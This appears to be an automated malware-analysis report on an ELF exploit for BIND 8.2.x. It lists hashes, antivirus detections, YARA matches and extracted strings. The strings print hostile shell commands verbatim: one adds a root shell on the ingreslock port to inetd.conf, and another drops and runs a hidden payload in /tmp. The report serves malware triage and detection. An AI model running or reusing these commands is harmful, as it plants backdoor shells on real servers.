Report #11712 check_circle

Binary
ABI
ELFOSABI_SYSV
Size
7.32KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
2a8521489788127893ac662bb58e5607
sha1
c7992571a7529461a0075d20fb209817458537af
crc32
0x60025aff
sha224
ed7151f044c19ab9111180af7455b261d0808217595c4a55a0a816e7
sha256
244520589158f8304f7414584afe9ef8de0fb7970ca9c5bee3fcf656385a505a
sha384
ce335ad8b091df4f0dd861ce8cc6ed2912cf6e3626024d5faab83c5700c597be5a415eb6db78efcef58c4718d356fe62
sha512
66015316d6cabecc433c17abba93d67b4f8b2ff658f2184945ef0f9c81f802497c0fcd11c0c84d48f970de0340b6b6bdfe147e0622ed1774436deed8718c8b44
ssdeep
96:fehEp6IloO4HANNfAzjKmrWcSED0Ck8jTbo7PfNRG5sELR7ZmYxx04nnWD/iCX/x:fyIlhKKsWc/0CJTsjKZLJ3xe4nnWD/i
Community
Google
False cancel
HashLib
False cancel
YARA
Matches
maldoc_getEIP_method_1, domain, is__elf, IP, contentis_base64, Misc_Suspicious_Strings

Suspicious
True check_circle

Dwarf
List

Number
0
Files
Sys

Home

Proc

Password

Suspicious
False cancel
Flags
Flags
0
Packer
List
None
Packed
False cancel
Network
IPs
GCC: (GNU) 2.7.2.3, GCC: (GNU) 2.7.2.3, GCC: (GNU) 2.7.2.3, GCC: (GNU) 2.7.2.3, GCC: (GNU) 2.7.2.3
URLs
/lib/ld-linux.so.2, ld-linux.so.2, copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/
Mails

Suspicious
True check_circle
Strings
List
.rel.got
copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/
echo ingreslock stream tcp nowait root /bin/sh sh -i >>/etc/inetd.conf; (/usr/sbin/inetd &); exit;
libc.so.6
ld-linux.so.2
.rel.plt
.rel.bss
/lib/ld-linux.so.2
(sleep 30; kill -9 %d >/dev/null 2>&1) &
system seems to be running bind 8.2.x on a linux
usage: %s address [-s][-e]
frame ptr is too low to be successfully exploited
frame ptr=0x%08x adr=%08x ofs=%d
cd /tmp; mkdir .tmp; cd .tmp; echo %s >d0; chmod +x d0; (./d0 >/dev/null 2>&1 &); exit;
inet_addr
stack dump:
port=%04x connected!
system does not seem to be a vulnerable linux
gethostbyname
connect
sleep
socket
fopen
fread
system
send
.hash
-s send infoleak packet
-e send exploit packet
.comment
_GLOBAL_OFFSET_TABLE_
_DYNAMIC
_environ
.dynamic
__environ
__gmon_start__
__errno_location
.shstrtab
__libc_init_first
_IO_stdout_
.rodata
.interp
__bss_start
/bin/sh
01.01
01.01
01.01
01.01
01.01
.strtab
.symtab
environ
sockmod
_edata
_etext
_init
.init
.fini
_fini
.dynsym
.dynstr
.ctors
.dtors
_start
getpid
ioctl
getopt
close
write
.got
_end
read
%s%02x

bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86
GCC: (GNU) 2.7.2.3
GCC: (GNU) 2.7.2.3
GCC: (GNU) 2.7.2.3
GCC: (GNU) 2.7.2.3
GCC: (GNU) 2.7.2.3
error
htons
getsockname
sprintf
perror
atexit
memset
.data
printf
strlen
memcpy
fflush
ntohs
exit
sent!
.note
bzero
PPRV
.plt
.text

Symbols
List

Number
0
Reason
Stripped
Suspicious
True check_circle
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False cancel
Sections
List
, .interp, .hash, .dynsym, .dynstr, .rel.got, .rel.bss, .rel.plt, .init, .plt, .text, .fini, .rodata, .data, .ctors, .dtors, .got, .dynamic, .bss, .comment, .note, .shstrtab
Number
22
Suspicious
False cancel
Segments
Number
5
Suspicious
False cancel
Compilers
List
GCC: (GNU) 2.7.2.3, GCC: (GNU) 2.7.2.3, GCC: (GNU) 2.7.2.3, GCC: (GNU) 2.7.2.3, GCC: (GNU) 2.7.2.3
Identified
5
Suspicious
True check_circle
Functions
List
, , __gmon_start__, , _DYNAMIC, , _GLOBAL_OFFSET_TABLE_, , _fini, , _init, , __libc_init_first, , __errno_location, , fflush, , memcpy, , fopen, , memset, , exit, , atexit, , system, , _IO_stdout_, , printf, , sprintf, , perror, , fread, , strlen, , bzero, , sleep, , getpid, , close, , getopt, , htons, , _environ, , read, , write, , ioctl, , socket, , connect, , getsockname, , send, , ntohs, , gethostbyname, , inet_addr, , __environ, , environ, , _start, , _etext, , _edata, , __bss_start, , _end,
Present
True check_circle
Anti-Debug
Ptrace
False cancel
Anti-disasm
False cancel
Entry Point
Address
0x80489bc
Suspicious
False cancel
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
5
Offset
52
Section Header
Size
40
Number
22
Offset
6620
AVclass
tsig
1
VirusTotal
md5
2a8521489788127893ac662bb58e5607
sha1
c7992571a7529461a0075d20fb209817458537af
SCANS (DETECTION RATE = 45.76%)
AVG
update: 20200920
version: 18.4.3895.0
detected: False cancel

CMC
update: 20200920
version: 2.7.2019.1
detected: False cancel

MAX
result: malware (ai score=100)
update: 20200920
version: 2019.9.16.1
detected: True check_circle

Bkav
update: 20200919
version: 1.3.0.9899
detected: False cancel

K7GW
update: 20200920
version: 11.141.35285
detected: False cancel

ALYac
result: Trojan.Linux.GenericA.12227
update: 20200920
version: 1.1.1.5
detected: True check_circle

Avast
update: 20200920
version: 18.4.3895.0
detected: False cancel

Avira
update: 20200920
version: 8.3.3.8
detected: False cancel

Baidu
update: 20190318
version: 1.0.0.2
detected: False cancel

Cynet
update: 20200917
version: 4.0.0.24
detected: False cancel

Cyren
update: 20200920
version: 6.3.0.2
detected: False cancel

DrWeb
update: 20200920
version: 7.0.49.9080
detected: False cancel

GData
result: Trojan.Linux.GenericA.12227
update: 20200920
version: A:25.27080B:27.20234
detected: True check_circle

Panda
update: 20200920
version: 4.6.4.2
detected: False cancel

VBA32
update: 20200918
version: 4.4.1
detected: False cancel

VIPRE
update: 20200920
version: 86830
detected: False cancel

Zoner
update: 20200919
version: 0.0.0.0
detected: False cancel

Comodo
result: Malware@#1v4vd6dc3zqnm
update: 20200920
version: 32827
detected: True check_circle

Ikarus
result: Trojan.Linux.Exploit
update: 20200920
version: 0.1.5.2
detected: True check_circle

McAfee
result: Linux/Exploit-Bind.a
update: 20200920
version: 6.0.6.653
detected: True check_circle

Rising
update: 20200920
version: 25.0.0.26
detected: False cancel

Sophos
result: Linux/Loit-C
update: 20200920
version: 4.98.0
detected: True check_circle

Yandex
update: 20200911
version: 5.5.2.24
detected: False cancel

Zillya
result: Trojan.Small.Linux.39
update: 20200919
version: 2.0.0.4178
detected: True check_circle

Arcabit
result: Trojan.Linux.GenericA.D2FC3
update: 20200920
version: 1.0.0.881
detected: True check_circle

FireEye
result: Trojan.Linux.GenericA.12227
update: 20200920
version: 32.36.1.0
detected: True check_circle

Sangfor
result: Malware
update: 20200814
version: 1.0
detected: True check_circle

TACHYON
update: 20200920
version: 2020-09-20.02
detected: False cancel

Tencent
update: 20200920
version: 1.0.0.1
detected: False cancel

ViRobot
update: 20200920
version: 2014.3.20.0
detected: False cancel

Ad-Aware
result: Trojan.Linux.GenericA.12227
update: 20200920
version: 3.0.16.117
detected: True check_circle

AegisLab
result: Hacktool.Linux.Tsig.3!c
update: 20200920
version: 4.2
detected: True check_circle

F-Secure
update: 20200920
version: 12.0.86.52
detected: False cancel

Fortinet
result: Linux/Hijack.A!worm
update: 20200920
version: 6.2.142.0
detected: True check_circle

Invincea
result: Linux/Loit-C
update: 20200920
version: 1.0.1.0
detected: True check_circle

Jiangmin
result: HackTool.Linux.fr
update: 20200920
version: 16.0.100
detected: True check_circle

Kingsoft
update: 20200920
version: 2013.8.14.323
detected: False cancel

Symantec
result: Trojan.Gen.2
update: 20200919
version: 1.12.0.0
detected: True check_circle

AhnLab-V3
update: 20200920
version: 3.18.1.10026
detected: False cancel

Antiy-AVL
update: 20200920
version: 3.0.0.1
detected: False cancel

Kaspersky
result: HackTool.Linux.Tsig.a
update: 20200920
version: 15.0.1.13
detected: True check_circle

MaxSecure
update: 20200919
version: 1.0.0.1
detected: False cancel

Microsoft
update: 20200920
version: 1.1.17400.5
detected: False cancel

Qihoo-360
result: Linux/Trojan.Hacktool.c09
update: 20200920
version: 1.0.0.1120
detected: True check_circle

ZoneAlarm
result: HackTool.Linux.Tsig.a
update: 20200920
version: 1.0
detected: True check_circle

ESET-NOD32
result: a variant of Linux/Exploit.Small.CZ
update: 20200920
version: 22020
detected: True check_circle

TrendMicro
result: TROJ_GEN.R002C0PIC20
update: 20200920
version: 11.0.0.1006
detected: True check_circle

BitDefender
result: Trojan.Linux.GenericA.12227
update: 20200920
version: 7.2
detected: True check_circle

K7AntiVirus
update: 20200920
version: 11.141.35285
detected: False cancel

SentinelOne
result: DFI - Malicious ELF
update: 20200724
version: 4.4.0.0
detected: True check_circle

Avast-Mobile
update: 20200920
version: 200920-00
detected: False cancel

Malwarebytes
update: 20200920
version: 3.6.4.335
detected: False cancel

TotalDefense
update: 20200920
version: 37.1.62.1
detected: False cancel

CAT-QuickHeal
update: 20200919
version: 14.00
detected: False cancel

NANO-Antivirus
result: Trojan.Elf32.NixC.cmpmo
update: 20200920
version: 1.0.134.25140
detected: True check_circle

BitDefenderTheta
update: 20200918
version: 7.2.37796.0
detected: False cancel

MicroWorld-eScan
result: Trojan.Linux.GenericA.12227
update: 20200920
version: 14.0.409.0
detected: True check_circle

SUPERAntiSpyware
update: 20200918
version: 5.6.0.1032
detected: False cancel

TrendMicro-HouseCall
result: TROJ_GEN.R002C0PIC20
update: 20200920
version: 10.0.0.1040
detected: True check_circle

total
59
sha256
244520589158f8304f7414584afe9ef8de0fb7970ca9c5bee3fcf656385a505a
scan_id
244520589158f8304f7414584afe9ef8de0fb7970ca9c5bee3fcf656385a505a-1600601940
resource
2a8521489788127893ac662bb58e5607
positives
27
scan_date
2020-09-20 11:39:00
verbose_msg
Scan finished, information embedded
response_code
1
Ltrace
Trace

Strace
Trace
4291execve"./malware"["./malware"] -1 ENOENT (No such file or directory)
4291write2"strace: exec: No such file or di"...40 40
4291exit_group1 ?

Analysis
Ltrace
Statically-compiled samples cannot be ltraced.

Reason
Timeout

Status
Success

Strace
Success

Results
True check_circle

DNS
Query

Response

TCP
Info

UDP
Info

HTTP
Info

Summary
DNS
False cancel

TCP
False cancel

UDP
False cancel

HTTP
False cancel

Binary
RF
confidence: 77.52%
suspicious: True check_circle
MLP
confidence: 83.69%
suspicious: True check_circle
SVM
confidence: 74.05%
suspicious: True check_circle
Add to Collection
Download